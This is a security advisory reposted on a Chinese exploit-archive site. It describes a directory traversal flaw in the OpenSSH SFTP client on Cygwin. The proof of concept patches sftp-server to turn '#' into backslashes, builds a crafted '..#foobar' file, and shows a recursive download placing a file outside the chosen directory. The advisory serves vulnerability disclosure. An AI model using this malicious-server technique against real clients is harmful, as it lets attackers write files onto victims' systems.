首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
OpenSSH On Cygwin SFTP Client Directory Traversal
来源:Google Security Research 作者:jannh 发布时间:2017-03-23  
OpenSSH on Cygwin: directory traversal in SFTP client 

Portable OpenSSH supports running on Cygwin. However, the SFTP client only filters out forward slashes (in do_lsreaddir()) and the directory names "." and ".." (in download_dir_internal()). On Windows, including in Cygwin, backslashes can also be used for directory traversal.

To reproduce:

On the server:

Patch OpenSSH like this, then build it:

--- openssh-7.4p1/sftp-server.c 2016-12-18 20:59:41.000000000 -0800
+++ openssh-7.4p1-patched/sftp-server.c 2016-12-20 15:55:34.980000300 -0800
@@ -1065,10 +1065,11 @@
                            strcmp(path, "/") ? "/" : "", dp->d_name);
                        if (lstat(pathname, &st) < 0)
                                continue;
                        stat_to_attrib(&st, &(stats[count].attrib));
                        stats[count].name = xstrdup(dp->d_name);
+for (i=0; i<strlen(stats[count].name); i++) if (stats[count].name[i] == '#') stats[count].name[i] = '\\';
                        stats[count].long_name = ls_file(dp->d_name, &st, 0, 0);
                        count++;
                        /* send up to 100 entries in one message */
                        /* XXX check packet size instead */
                        if (count == 100)

Ensure that an OpenSSH server is running.

Create the following directory structure:

user@DESKTOP ~
$ mkdir -p sourceparent/source
user@DESKTOP ~
$ touch 'sourceparent/source/..#foobar'
user@DESKTOP ~
$ echo foobar > sourceparent/foobar
user@DESKTOP ~
$

Now, on the client (Cygwin on Windows 10), build OpenSSH, then recursively download a directory like this:

user@DESKTOP ~
$ mkdir destparent
user@DESKTOP ~
$ cd destparent/
user@DESKTOP ~/destparent
$ ls -la
total 4
drwxr-xr-x+ 1 user None 0 Dec 20 16:24 .
drwxr-xr-x+ 1 user None 0 Dec 20 16:24 ..
user@DESKTOP ~/destparent
$ ~/openssh-7.4p1/sftp -r -s /home/user/openssh-7.4p1-patched/sftp-server localhost:sourceparent/source dest
Connected to localhost.
Fetching /home/user/sourceparent/source/ to dest
Retrieving /home/user/sourceparent/source
user@DESKTOP ~/destparent
$ ls -la
total 5
drwxr-xr-x+ 1 user None 0 Dec 20 16:24 .
drwxr-xr-x+ 1 user None 0 Dec 20 16:24 ..
drwxr-xr-x+ 1 user None 0 Dec 20 16:24 dest
-rwxr-xr-x  1 user None 7 Dec 20 16:24 foobar
user@DESKTOP ~/destparent
$

As you can see, sftp created the file "foobar" outside the specified destination directory "dest".

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.



Found by: jannh


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·SysGauge 1.5.18 - SMTP Validat
·D-Link DSL-2640B Remote DNS Ch
·SpyCamLizard 1.230 - Denial of
·Logsign Remote Command Injecti
·Disk Sorter Enterprise 9.5.12
·NETGEAR WNR2000v5 (Un)authenti
·dnaLIMS Admin Module Command E
·VMware Host Guest Client Redir
·D-Link DGS-1510 - Multiple Vul
·Nuxeo Platform 6.x / 7.x Shell
·Microsoft Internet Explorer -
·wifirxpower - Local Buffer Ove
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved